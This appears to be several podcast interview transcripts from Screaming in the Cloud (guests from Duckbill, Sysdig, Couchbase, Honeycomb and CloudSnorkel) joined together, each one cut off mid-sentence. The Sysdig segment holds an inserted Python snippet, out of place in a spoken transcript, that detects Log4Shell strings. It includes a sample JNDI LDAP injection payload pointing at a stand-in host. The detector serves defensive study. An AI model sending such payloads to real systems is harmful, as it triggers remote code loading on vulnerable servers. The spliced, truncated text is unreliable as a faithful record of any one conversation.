spotlight.Jeremy: Of course. 
I’m happy to be here, Corey.Corey: So, you’ve been here, what, it feels like we’re coming up on the two-year mark or pretty close to it. I know that I had you on as a contractor to assist with a re:Invent a couple years back and it went so well, it’s, “How do we get you in here full time? Oh, we can hire you.” And the rest sort of snowballed from there.Jeremy: Yes. January will be two years, in fact.Corey: I think that it’s one of the hardest things to do for you professionally has always been to articulate the value that you bring because I’ve been working with you here for two years and I still do a pretty poor job of doing it, other than to say, once you get brought into a project, all of the weird things that cause a disjoint or friction along the way or cause the wheels to fall off magically go away. But I still struggle to articulate what that is in a context that doesn’t just make it sound like I’m pumping up my buddy, so to speak. How do you define what it is that you do? I mean, now Director of Media Operations is one of those titles that can cover an awful lot of ground, and because of a small company, it obviously does. But how do you frame what you do?Jeremy: Well, I am a professional hat juggler, for starters. There are many moving parts and I come from a history of project management, a long, long history of project management. And I’ve worked with projects from small scale to the large scale spanning globally and I always understand that there are many moving parts that have to be tracked and handled, and there are many people involved in that process. And that’s what I bring here to The Duckbill Group is that experience of managing the small details while also understanding the larger picture.Corey: It’s one of those hard-to-nail-down type of roles. It’s sort of one of those glue positions where, in isolation, it’s well, there’s not a whole lot that gets done when it is just you. 
I felt the same thing my entire career as a sysadmin turned other things that are basically fancy titles but still distilled down to systems administrator. And that is, well, step one, I need a web property or some site or something that is going to absorb significant traffic and have developers building it. Because, “Oh, I’m going to run some servers.” “Okay, for what purpose?” “I don’t know.”I was never good at coming up with the application that rode on top of these things. But give me someone else’s application, I could make it scale in a bunch of exciting ways, back when that was trickier to do at smaller scale. These days, the providers out there make it a heck of a lot easier and all I really wind up doing is—these days—making fun of other people’s hard work. It keeps things simpler, somehow.Jeremy: There always has to be a voice leading that development and understanding what you’re trying to achieve at the end. And that’s what a project manager, or in my role as Director of Media Operations, does: I see our vision to the end and I bring in the people and resources necessary to make it happen.Corey: Your background is kind of interesting. You have done a lot of things at a lot of places, mostly large companies, and mostly on the corporate IT side of the world. But to my understanding, this is the first time you’ve really gone into anything approaching significant depth with things that are cloud-oriented. What’s it been like for you?Jeremy: It’s a new experience. As you said, I’ve had experience all over the industry. I come from traditional data centers and networking. I’m originally trained in Cisco networking from way back in the day, and then I moved on into virtual reality development and other infrastructure management. 
But getting into the cloud has been something new and it’s been a shift from old-school data centers in a way that is complicated to wrap your head around.Whereas in a data center before, it was really clear you had shelves of hardware, you had your racks, you had your disks, you had finite resources, and this is what you did; you built your applications on top of it and that was the end of the conversation. Now, the application is the primary part of the conversation, and scaling is third, fourth, fifth in the conversation. It’s barely even mentioned because obviously we’re going to put this in the cloud and obviously we’re going to scale this out. And that’s a power and capability that I had not seen in past companies, past infrastructures. And so, learning about the cloud, learning about the numerous AWS [laugh] services that exist and how they interact, has been a can of worms to understand and slowly take one worm out at a time and work with it and become its friend.Corey: I was recently reminded of a time before cloud where I got to go hang out with the founders at Oxide over in Oakland. I’d forgotten so much of the painful day-to-day minutia of what it took to get servers up and running in a data center, of the cabling nonsense, of slicing your fingers to ribbons on rack nuts, on waiting weeks on end for the server you ordered to show up, ideally in the right configuration, of getting 12 servers and 11 of them provision correctly and the 12th doesn’t for whatever godforsaken reason. So, much of that had just sort of slipped my mind. And, “Oh, yeah, that’s right. That’s what the whole magic of cloud was.”Conversely, I’ve done a fair bit of IoT stuff at home for the past year or so, just out of basically looking for a hobby, and it feels different, for whatever reason, to be running something that I’m not paying a third party by the hour for. 
The actual money that we’re talking about in either case is nothing, but there’s a difference psychologically and I’m wondering how much the current cloud story is really shaping the way that an entire generation is viewing computers.Jeremy: I would believe that it has completely shifted how we view computers. If you know internet and computing history, we’re kind of traveling back to the old ways of the centrally managed server and a bunch of nodes hanging off of it, them basically being dummy nodes that access that central resource. And so, with the centralization of AWS resources and kind of a lot of the internet there, we’ve turned everyone into just a node that accesses this centralized resource. And with more and more applications moving to the web, like, natively the web, it’s changing the need for compute on the consumer side in such a way that we’ve never seen, ever. We have gone from a standard two-and-a-half, three-foot tall tower sitting in your living room, and this is the family computer, to everybody has their own personal computer, to everyone has their own laptops, to now, people are moving away from even those pieces of hardware to iPads because all of the resources that they use exist on the internet. So, now you get the youngest generation that’s growing up and the only thing that they’ve ever known as far as computers go is an iPad in their hands. When I talk about a tower, what does that mean to them?Corey: It’s kind of weird, but I feel like we went through a generation where it felt like the early days of automobiles, where you needed to be pretty close to a mechanic in order to reliably be convinced you could take a car any meaningful distance. And then they became appliances again. And in some cases, because manufacturers don’t want people working on cars, you also have to be more or less a hacker of sorts to wind up getting access to your car. I think, on some level, that we’ve seen computers turn into appliances like that. 
When I was a kid, I was one of those kids that was deep into computers and would help the teachers get their overhead projector-style thing working and whatnot.And I think we might be backing away from that, on some level, just because it’s not necessary to have that level of insight into how a system works to use it effectively. And I’m not trying to hold back the tide of progress. I just find it interesting as far as how we
Alex Lawrence, Field CISO at Sysdig, joins Corey on Screaming in the Cloud to discuss how he went from studying bioluminescence and mycology to working in tech, and his stance on why open source is the future of cloud security. Alex draws an interesting parallel between the creative culture at companies like Pixar and the iterative and collaborative culture of open-source software development, and explains why iteration speed is crucial in cloud security. Corey and Alex also discuss the pros and cons of having so many specialized tools that tackle specific functions in cloud security, and the different postures companies take towards their cloud security practices. About AlexAlex Lawrence is a Field CISO at Sysdig. Alex has an extensive history working in the datacenter as well as with the world of DevOps. Prior to moving into a solutions role, Alex spent a majority of his time working in the world of OSS on identity, authentication, user management and security. Alex's educational background has nothing to do with his day-to-day career; however, if you'd like to have a spirited conversation on bioluminescence or fungus, he'd be happy to oblige.Links Referenced: Sysdig: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by our friends over at Sysdig, and they have brought to me Alexander Lawrence, who’s a principal security architect over at Sysdig. Alexander, thank you for joining me.Alex: Hey, thanks for having me, Corey.Corey: So, we all have fascinating origin stories. 
Invariably you talk to someone, no one in tech emerged fully-formed from the forehead of some God. Most of us wound up starting off doing this as a hobby, late at night, sitting in the dark, rarely emerging. You, on the other hand, studied mycology, so watching the rest of us sit in the dark and growing mushrooms was basically how you started, is my understanding of your origin story. Accurate, not accurate at all, or something in between?Alex: Yeah, decently accurate. So, I was in school during the wonderful tech bubble burst, right, high school era, and I always told everybody, there’s no way I’m going to go into technology. There’s tons of people out there looking for a job. Why would I do that? And let’s face it, everybody expected me to, so being an angsty teenager, I couldn’t have that. So, I went into college looking into whatever I thought was interesting, and it turned out I had a predilection to go towards fungus and plants.Corey: Then you realized some of them glow and that wound up being too bright for you, so all right, we’re done with this; time to move into tech?Alex: [laugh]. Strangely enough, my thesis, my capstone, was on the coevolution of bioluminescence across aquatic and terrestrial organisms. And so, did a lot of focused work on specifically bioluminescent fungus and bioluminescing fish, like Photoblepharon palpebratus and things like that.Corey: When I talk to people who are trying to figure out, okay, I don’t like what’s going on in my career, I want to do something different, and their assumption is, oh, I have to start over at square one. It’s no, find the job that’s halfway between what you’re doing now and what you want to be doing, and make lateral moves rather than starting over five years in or whatnot. But I have to wonder, how on earth did you go from A to B in this context?Alex: Yeah, so I had always done tech. My first job really was in tech at the school districts that I went to in high school. 
And so, I went into college doing tech. I volunteered at the ELCA and other organizations doing tech, and so it basically funded my college career. And by the time I finished up through grad school, I realized my life was going to be writing papers so that other people could do the research that I was coming up with, and I thought that sounded like a pretty miserable life.And so, it became a hobby, and the thing I had done throughout my entire college career was technology, and so that became my new career and vocation. So, I was kind of doing both, and then ended up landing in tech for the job market.Corey: And you’ve effectively moved through the industry to the point where you’re now in security architecture over at Sysdig, which, when I first saw Sysdig launch many years ago, it was, this is an interesting tool. I can see observability stories, I can see understanding what’s going on at a deep level. I liked it as a learning tool, frankly. And it makes sense, with the benefit of hindsight, that oh, yeah, I suppose it does make some sense that there are security implications thereof. But one of the things that you’ve said that I really want to dig into that I’m honestly in full support of because it’ll irritate just the absolute worst kinds of people is—one of the core beliefs that you espouse is that security when it comes to cloud is inherently open-source-based or at least derived. I don’t want to misstate your position on this. How do you view it?Alex: Yeah. Yeah, so basically, the stance I have here is that the future of security in cloud is open-source. And the reason I say that is that it’s a bunch of open standards that have basically produced a lot of the technologies that we’re using in that stack, right, your web servers, your automation tooling, all of your different components are built on open stacks, and people are looking to other open tools to augment those things. 
And the reality is that the security environment that we’re in is changing drastically in the cloud as opposed to what it was like in the on-premises world. On-prem was great—it still is great; a lot of folks still use it and thrive on it—but as we look at the way software is built and the way we interface with infrastructure, the cloud has changed that dramatically.Basically, things are a lot faster than they used to be. The model we have to use in order to make sure our security is good has dramatically changed, right, and all that comes down to speed and how quickly things evolve. I tend to take a position that one single brain—one entity, so to speak—can’t keep up with that rapid evolution of things. Like, a good example is Log4j, right? When Log4j hit this last year, that was a pretty broad attack that affected a lot of people. You saw open tooling out there, like Falco and others, that had a policy to detect and help triage it within a couple of hours of it hitting the internet. Other proprietary tooling took much longer than two hours.Corey: Part of me wonders what the root cause behind that delay is because it’s not that the engineers working at these companies are somehow worse than folks in the open communities. In some cases, they’re the same people. It feels like it’s almost corporate process ossification of, “Okay, we built a thing. Now, we need to make sure it goes through branding and legal and marketing and we need to bring in 16 other teams to make this work.” Whereas in the open-source world, it feels like there’s much more of a, “I push the deploy button and it’s up. The end.” There is no step two.Alex: [laugh]. Yeah, so there is certainly a certain element of that. And I think it’s just the way different paradigms work. There’s a fantastic book out there called Creativity, Inc., and it’s basically a book about how Pixar manages itself, right? How do they deal with creating movies? 
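As a quick aside on the Log4j example above: Falco itself works at the syscall level, which is beyond the scope of a snippet, but many of the fast community triage scripts keyed on the telltale `${jndi:...}` lookup string appearing in request data. A deliberately naive sketch of that idea (illustrative only; real detections also handle the many obfuscated variants this toy pattern misses):

```python
import re

# Naive indicator for Log4Shell-style payloads: a ${jndi:<scheme>://...}
# lookup in logged input. Real-world rules also catch nested/obfuscated
# forms like ${${lower:j}ndi:...}, which this simple pattern will not.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def suspicious_lines(log_lines):
    """Return the log lines containing a plain JNDI lookup string."""
    return [line for line in log_lines if JNDI_PATTERN.search(line)]

logs = [
    "GET /search?q=widgets 200",
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://evil.example/a} 200",
    "POST /login 401",
]

print(suspicious_lines(logs))  # flags only the second line
```

The point of the anecdote stands either way: a shared, inspectable rule like this can be written, reviewed, and distributed by a community in hours, without a release train behind it.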
How do they deal with doing what they do well?And really, what it comes down to is fostering a culture of creativity. And that typically revolves around being able to fail fast, take risks, see if it sticks, see if it works. And it’s not that corporate entities don’t do that. They certainly do, but again, if you think about the way the open-source world works, people are submitting, you know, PRs, pull requests, they’re putting out different solutions, different fixes to problems, and the ones that end up solving it the best are often the ones that end up coming to the top, right? And so, it’s just—the way you iterate is much more akin to that kind of creativity-based mindset than I think you get out of traditional organizations and corporations.Corey: There’s also, I think—I don’t know if this is necessarily the exact point, but it feels like it’s at least aligned with it—where there was for a long time—by which I mean, pretty much 40 years at this point—a debate between open disclosure, telling people of things that you have found in vendors’ products, versus closed disclosure—or whatever the term is where you tell the vendor, give them time to fix it, and it gets out the door. But we’ve seen again and again and again, where researchers find something, report it, and then it sits there, in some cases for years, but then when it goes public and the company looks bad as a result, they scramble to fix it. I wish it were not this way, but it seems that in some cases, public shaming is the only thing that works to get companies to secure their stuff.Alex: Yeah, and I don’t know if it’s public shaming, per se, that does it, or it’s just priorities, or it’s just, you know, however it might go, there’s always been this notion of, “Okay, we found a breach. 
Let’s disclose appropriately, you know, between two entities, give time to remediate.” Because there is a potential risk that if you disclose publicly that it can be abused and used in very malicious ways—and we certainly don’t want that—but there also is a certain level of onus once the disclosure happens privately that we got to
Laurent Doguin, Director of Developer Relations & Strategy at Couchbase, joins Corey on Screaming in the Cloud to talk about the work that Couchbase is doing in the world of databases and developer relations, as well as the role of AI in their industry and beyond. Together, Corey and Laurent discuss Laurent’s many different roles throughout his career, including what made him want to come back to a role at Couchbase after stepping away for five years. Corey and Laurent dig deep on how Couchbase has grown in recent years and how it’s using artificial intelligence to offer an even better experience to the end user.About LaurentLaurent Doguin is Director of Developer Relations & Strategy at Couchbase (NASDAQ: BASE), a cloud database platform company that 30% of the Fortune 100 depend on.Links Referenced: Couchbase: XKCD #927: DB-Engines: Twitter: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? Solo.io is here to be your guide to connectivity in the cloud-native universe! Solo.io, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters: your application? Solo.io’s got your back with networking for applications, not infrastructure. 
Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with Solo.io. And here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo by Solo.io. DevOps and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit solo.io today and level up your networking game.Corey: Welcome to Screaming in the Cloud, I’m Corey Quinn. This promoted guest episode is brought to us by our friends at Couchbase. And before we start talking about Couchbase, I would rather talk about not being at Couchbase. Laurent Doguin is the Director of Developer Relations and Strategy at Couchbase. First, Laurent, thank you for joining me.Laurent: Thanks for having me. It’s a pleasure to be here.Corey: So, what I find interesting is that this is your second time at Couchbase, where you were a developer advocate there for a couple of years, then you had five years of, we’ll call it wilderness I suppose, and then you return to be the Director of Developer Relations. Which also ties into my personal working thesis of, the best way to get promoted at a lot of companies is to leave and then come back. But what caused you to decide, all right, I’m going to go work somewhere else? And what made you come back?Laurent: So, I’ve joined Couchbase in 2014. Spent about two or three years as a DA. And during those three years as a developer advocate, I’ve been advocating SQL database and I—at the time, it was mostly DBAs and ops I was talking to. And DBA and ops are, well, recent, modern ops are writing code, but they were not the people I wanted to talk to when I was a developer advocate. I came from a background of developer, I’ve been a platform engineer for an enterprise content management company. I was writing code all day.And when I came to Couchbase, I realized I was mostly talking about Docker and Kubernetes, which is still cool, but not what I wanted to do. 
I wanted to talk about developers, how they use a database to build a better app, how they use key-value, and those weird things like MapReduce. At the time, MapReduce was still, like, a weird thing for a lot of people, and probably still is because now everybody’s doing SQL. So, that’s what I wanted to talk about. I wanted to… engage with people I identify with, really. And so, didn’t happen. Left. Built a Platform as a Service company called Clever Cloud. They started about four or five years before I joined. We went from seven people to thirty-one, fully bootstrapped, no VC. That’s an interesting way to build a company in this age.Corey: Very hard to do because it takes a lot of upfront investment to build software, but you can sort of subsidize that via services, which is what we’ve done here in some respects. But yeah, that’s a hard road to walk.Laurent: That’s the model we had—and especially when your competition is AWS or Azure or GCP, so that was interesting. So entrepreneurship, it’s not for everyone. I did my four years there and then I realized, maybe I’m going to do something else. I met my former colleagues of Couchbase at a software conference called Devoxx, in France, and they told me, “Well, there’s a new sheriff in town. You should come back and talk to us. It’s all about developers, we are repositioning, rehandling the way we do marketing at Couchbase. Why not have a conversation with our new CMO, John Kreisa?”And I said, “Well, I mean, I don’t have anything to do. I actually built a brewery during that past year with some friends. That was great, but that’s not going to feed me or anything. So yeah, let’s have a conversation about work.” And so, I talked to John, I talked to a bunch of other people, and I realized [unintelligible 00:03:51], he actually changed, like, there was a—they were purposely going [against 00:03:55] developer, talking to developer. And that was not the case, necessarily, five, six years before that.So, that’s why I came back. 
The product is still amazing, the people are still amazing. It was interesting to find a lot of people that still work there after, what, five years. And it’s a company based in… California, headquartered in California, so you would expect people to, you know, jump around a bit. And I was pleasantly surprised to find the same folks there. So, that was also one of the reasons why I came back.Corey: It’s always a strong endorsement when former employees rejoin a company. Because, I don’t know about you, but I’ve always been aware of those companies you work for, you leave. Like, “Aw, I’m never doing that again for love or money,” just because it was such an unpleasant experience. So, it speaks well when you see companies that do have a culture of boomerangs, for lack of a better term.Laurent: That’s the one we use internally, and there’s a couple. More than a couple.Corey: So, one thing that seems to have been a thread through most of your career has been an emphasis on developer experience. And I don’t know if we come at it from the same perspective, but to me, what drives me nuts is honestly, with my work in cloud, bad developer experience manifests as the developer in question feeling like they’re somehow not very good at their job. Like, they’re somehow not understanding how all this stuff is supposed to work, and honestly, it leads to feeling like a giant fraud. And I find that it’s pernicious because even when I intellectually know for a fact that I’m not the dumbest person ever to use this tool when I don’t understand how something works, the bad developer experience manifests to me as, “You’re not good enough.” At least, that’s where I come at it from.Laurent: And also, I [unintelligible 00:05:34] to people that build these products because if we build the products, the user might be in the same position that we are right now. And so, we might be responsible for that experience [unintelligible 00:05:43] a developer, and that’s not a great feeling.
So, I completely agree with you. I’ve tried to… always stay at software-focused companies, whether it was Nuxeo, Couchbase, Clever Cloud, and then Couchbase. And I guess one of the good things about coming back to a developer-focused era is all the product alignment.Like, a lot of people talk about product-led [growth 00:06:08] and what it means. To me what it means was, what it meant—what it still means—is building a product that developers want to use, and not just want to, sometimes it’s imposed on you, but actually are happy to use, and as you said, don’t feel completely stupid about it in front of the product. It goes through different things. We’ve recently revamped our Couchbase UI, Couchbase Capella UI—Couchbase Capella is a managed cloud product—and so we’ve added a lot of in-product getting-started guidelines, snippets of code, to help developers get started and not have that feeling of, “What am I doing? Why is it not working and what’s going on?”Corey: That’s an interesting decision to make, just because historically, working with a bunch of tools, the folks who are building the documentation working with that tool tend to generally be experts at it, so they tend to optimize for improving the experience of someone who has been using it for five years as opposed to the newcomer. So, I find that the longer a product is in existence, in many cases, the worse the new user experience becomes because companies tend to grow and sprawl in different ways, and the product does likewise. And if you don’t know the history behind it, “Oh, your company, what does it do?” And you look at the website and there’s 50 different offerings that you have—like, the AWS landing page—it becomes overwhelming very quickly. So, it’s neat to see that emphasis throughout the user interface on the new developer experience.On the other side of it, though, how are th
Mike Goldsmith, Staff Software Engineer at Honeycomb, joins Corey on Screaming in the Cloud to talk about OpenTelemetry, company culture, and the pros and cons of Go vs. .NET. Corey and Mike discuss why OTel is such an important tool, while pointing out its double-edged sword of being fully open-source and community-driven. Opening up about Honeycomb’s company culture and how to find a work-life balance as a fully-remote employee, Mike points out how core values and social interaction breathe life into a company like Honeycomb.About MikeMike is an open-source-focused software engineer who builds tools to help users create, shape, and deliver system & application telemetry. Mike contributes to a number of OpenTelemetry initiatives, including being a maintainer for the Go auto-instrumentation agent and the Go proto packages, and an emeritus maintainer of the .NET SDK.Links Referenced: Honeycomb: Twitter: Honeycomb blog: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by our friends at Honeycomb who I just love talking to. And we’ve gotten to talk to these folks a bunch of different times in a bunch of different ways. They’ve been a recurring sponsor of this show and my other media nonsense, they’ve been a reference customer for our consulting work at The Duckbill Group a couple of times now, and we just love working with them just because every time we do we learn something from it. I imagine today is going to be no exception. My guest is Mike Goldsmith, who’s a staff software engineer over at Honeycomb.
Mike, welcome to the show.Mike: Hello. Thank you for having me on the show today.Corey: So, I have been familiar with Honeycomb for a long time. And I’m still trying to break myself out of the misapprehension that, oh, they’re a small, scrappy, 12-person company. You are very much not that anymore. So, we’ve gotten to a point now where I definitely have to ask the question: what part of the observability universe that Honeycomb encompasses do you focus on?Mike: For myself, I’m very focused on the telemetry side, so I work on the tools that customers deploy in their own infrastructure to collect all of that useful data that we can then send on to Honeycomb to make use of, and help identify where the problems are, where things are changing, and how we can best serve that data.Corey: You’ve been, I guess on some level, there’s—I’m trying to make this not sound like an accusation, but I don’t know if we can necessarily avoid that—you have been heavily involved in OpenTelemetry for a while, both professionally, as well as an open-source contributor in your free time because apparently you also don’t know how to walk away from work when the workday is done. So, let’s talk about that a little bit because I have a number of questions. Starting at the very beginning, for those who have not gone trekking through that particular part of the wilderness-slash-swamp, what is OpenTelemetry?Mike: So, OpenTelemetry is a vendor-agnostic set of tools that allow anybody to collect data about their system and then send it to a target back-end to make use of that data. The data, the visualization tools, and the tools that make use of that data are a variety of different things, so whether it’s tracing data or metrics or logs, and then it’s trying to take value from that.
The big thing OpenTelemetry is aimed at doing is making the collection of the data and the transit of the data to wherever you want to send it a community-owned resource, so it’s not like you get vendor lock-in by using one vendor and then—when you want to go and try a different tool—you’ve got to re-instrument or change your application heavily to make use of it. OpenTelemetry abstracts all that away, so all you need to know about is what you’re instrumented with, what [unintelligible 00:03:22] can make of that data, and then you can send it to one or multiple different tools to make use of that data. So, you can even compare some tools side-by-side if you wanted to.Corey: So, given that it’s an open format, from the customer side of the world, this sounds awesome. Is it envisioned as something that gets instrumented at the application itself? Or once I send it to another observability vendor, is it envisioned that okay, if I send this data to Honeycomb, I can then instrument what Honeycomb sees about that and then send that onward somewhere else, maybe my ancient rsyslog server, maybe a different observability vendor that has a different emphasis? Like, how is it envisioned unfolding within the ecosystem? Like, in other words, can I build a giant ring of these things that just keep building an infinitely expensive loop?Mike: Yeah. So ideally, you would try to pick one or a few tools that will provide the most value that you can send to, and then they could answer all of the questions for you.
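Mike’s point—instrument once, then send the same data to one or several back-ends, even side by side—can be sketched in a few lines. This is a toy model of the shape of the idea, not the real OpenTelemetry API; every class and method name below is invented for illustration:

```python
class Exporter:
    """Anything that can receive finished spans."""
    def export(self, span):
        raise NotImplementedError

class InMemoryExporter(Exporter):
    """Stand-in for a vendor back-end: just remembers what it was sent."""
    def __init__(self):
        self.received = []
    def export(self, span):
        self.received.append(span)

class Tracer:
    """The application only ever talks to this one interface."""
    def __init__(self, exporters):
        self.exporters = exporters
    def record(self, name, **attributes):
        span = {"name": name, **attributes}
        for exporter in self.exporters:  # same data goes to every back-end
            exporter.export(span)
        return span

# Two "vendors" side by side; the instrumentation code doesn't know or care.
vendor_a, vendor_b = InMemoryExporter(), InMemoryExporter()
tracer = Tracer([vendor_a, vendor_b])
tracer.record("checkout", user="alice", duration_ms=42)
```

Because the application only depends on the `Tracer` interface, swapping one back-end for another—or running two at once to compare them—touches no instrumentation code, which is the escape from the lock-in Mike describes.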
So, at Honeycomb, we try to—we are primarily focused on tracing because we want to do application-level information to say, this user had this interaction, this is the context of what happened, these are the things that they clicked on, this is the information that flowed through your back-end system, this is the line-item order that was generated, the email content, all of those things all linked together so we know that person did this thing, it took this amount of time, and then over a longer period of time, from the analytics point of view, you can then say, “These are the most popular things that people are doing. This is typically how long it takes.” And then we can highlight outliers to say, “Okay, this person is having an issue.” This individual person, we can identify them and say, “This is an issue. This is what’s different about what they’re doing.”So, that’s quite a unique tracing tool or opportunity there. So, that lets you really drive what’s happening rather than what has happened. So, logs and metrics are very backward-looking to say, “This is the thing that happened,” and try to give you the context around it. Tracing tries to give you that extra layer of context to say that this thing happened and it had all of these things related to it, and why is it interesting?Corey: It’s odd to me that vendors would be putting as much energy into OpenTelemetry—or OTel, as it always seems to be abbreviated when I encounter it, so I’m using the term just so people go, “Oh, wait, that’s that thing I keep seeing.
What is that?” Great—but it seems odd to me that vendors would be as embracing of that technology as they have been, just because historically, I remember whenever I had an application I was using in production in anger—which honestly, ‘anger’ is a great name for the production environment—whenever I was trying to instrument things, it was okay, you’d have to grab this APM tool’s library and instrument there, and then something else as well, and you wound up with an order-of-operations problem of which one wrapped the other. And sometimes that caused problems. And of course, changing vendors meant you had to go and redeploy your entire application with different instrumentation and hope nothing broke. There was a lock-in story that was great for the incumbents back when that was state of the art. But even some of those incumbents are now embracing OTel. Why?Mike: I think it’s because it’s showing that there’s such a diverse group of tools there, and [unintelligible 00:06:32] being the one that you’ve selected a number of years ago and then they could hold on to that. The momentum slowed because they were able to move at a slower pace—they were the de facto tooling. And then once new companies and competitors came around and were open to trying to get a part of that market share, it’s given the opportunity to really pick the tool that is right for the job, rather than just what is perceived to be the best tool because it’s the largest one or the one that most people are using. OpenTelemetry allows an organization that’s providing those tools to focus on being the best at it, rather than just the biggest one.Corey: That is, I think, a more enlightened perspective than frankly, I expect a number of companies out there to have taken, just because it seems like lock-in seems to be the order of the day for an awful lot of companies.
Like, “Okay, why are customers going to stay with us?” “Because we make it hard to leave,” is… I can understand the incentive, but that only works for so long if you’re not actively solving a problem that customers have. One of the challenges that I ran into, even with OTel, was back when I was last trying to instrument a distributed application—which was built entirely on Lambda—is the fact that I was doing this for an application that was built entirely on Lambda. And it felt like the right answer was to, oh, just use an OTel layer—a Lambda layer that wound up providing the functionality you cared about.But every vendor seemed to have their own. Honeycomb had one, Lightstep had one, AWS had one, and now it’s oh, dear, this is just the next evolution of that specific agent problem. How did that play out? Is that still the way it works? Are there other good reasons for this? Or is this just people trying to slap a logo on things?Mike: Yeah, so being a fully open-source project and a community-dr
Amir Szekely, Owner at CloudSnorkel, joins Corey on Screaming in the Cloud to discuss how he got his start in the early days of cloud and his solo project, CloudSnorkel. Throughout this conversation, Corey and Amir discuss the importance of being pragmatic when moving to the cloud, and the different approaches they see in developers from the early days of cloud to now. Amir shares what motivates him to develop open-source projects, and why he finds fulfillment in fixing bugs and operating CloudSnorkel as a one-man show. About AmirAmir Szekely is a cloud consultant specializing in deployment automation, AWS CDK, CloudFormation, and CI/CD. His background includes security, virtualization, and Windows development. Amir enjoys creating open-source projects like cdk-github-runners, cdk-turbo-layers, and NSIS.Links Referenced: CloudSnorkel: Personal website: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn, and this is an episode that I have been angling for for longer than you might imagine. My guest today is Amir Szekely, who’s the owner at CloudSnorkel. Amir, thank you for joining me.Amir: Thanks for having me, Corey. I love being here.Corey: So, I’ve been using one of your open-source projects for an embarrassingly long amount of time, and for the longest time, I make the critical mistake of referring to the project itself as CloudSnorkel because that’s the word that shows up in the GitHub project that I can actually see that jumps out at me. 
The actual name of the project within your org is cdk-github-runners if I’m not mistaken.Amir: That’s real original, right?Corey: Exactly. It’s like, “Oh, good, I’ll just mention that, and suddenly everyone will know what I’m talking about.” But ignoring the problems of naming things well, which is a pain that everyone at AWS or who uses it knows far too well, the product is basically magic. Before I wind up basically embarrassing myself by doing a poor job of explaining what it is, how do you think about it?Amir: Well, I mean, it’s a pretty simple project, which I think is what makes it great as well. It creates GitHub runners with CDK. That’s about it. It’s in the name, and it just does that. And I really tried to make it as simple as possible and kind of learn from other projects that I’ve seen that are similar, and basically learn from my pain points in them.I think the reason I started is because I actually deployed CDK runners—sorry, GitHub runners—for one company, and I ended up using the Kubernetes one, right? So, GitHub themselves, they have two projects they recommend—and not to nudge GitHub, but please recommend my project one day as well—they have the Kubernetes controller and they have the Terraform deployer. And the specific client that I worked for, they wanted to use Kubernetes. And I tried to deploy it, and, Corey, I swear, I worked three days; three days to deploy the thing, which was crazy to me. And every single step of the way, I had to go and read some documentation, figure out what I did wrong, and apparently the order the documentation was in was incorrect.And I had to—I even opened tickets, and they—you know, they were rightfully like, “It’s an open-source project. Please contribute and fix the documentation for us.” At that point, I said, “Nah.” [laugh].
Let me create something better with CDK and I decided just to have the simplest setup possible.So usually, right, what you end up doing in these projects, you have to set up either secrets or SSM parameters, and you have to prepare the ground and you have to get your GitHub token and all those things. And that’s just annoying. So, I decided to create a—Corey: So much busy work.Amir: Yes, yeah, so much busy work and so much boilerplate and so much figuring out the right way and the right order, and just annoying. So, I decided to create a setup page. I thought, “What if you can actually install it just like you install any app on GitHub,” which is the way it’s supposed to be, right? So, when you install cdk-github-runners—CloudSnorkel—you get an HTML page and you just click a few buttons and you tell it where to install it and it just installs it for you. And it sets the secrets and everything. And if you want to change the secret, you don’t have to redeploy. You can just change the secret, right? You have to roll the token over or whatever. So, it’s much, much easier to install.Corey: And I feel like I discovered this project through one of the more surreal approaches—and I had cause to revisit it a few weeks ago when I was redoing my talk for the CDK Community Day, which has since happened and people liked the talk—and I mentioned what CloudSnorkel had been doing and how I was using the runners accordingly. So, that was what accidentally caused me to pop back up with, “Hey, I’ve got some issues here.” But we’ll get to that. Because once upon a time, I built a Twitter client for creating threads because shitposting is my love language; I would sit and create Twitter threads in the middle of live keynote talks. Threading in the native client was always terrible, and I wanted to build something that would help me do that. So, I did.And it was up for a while.
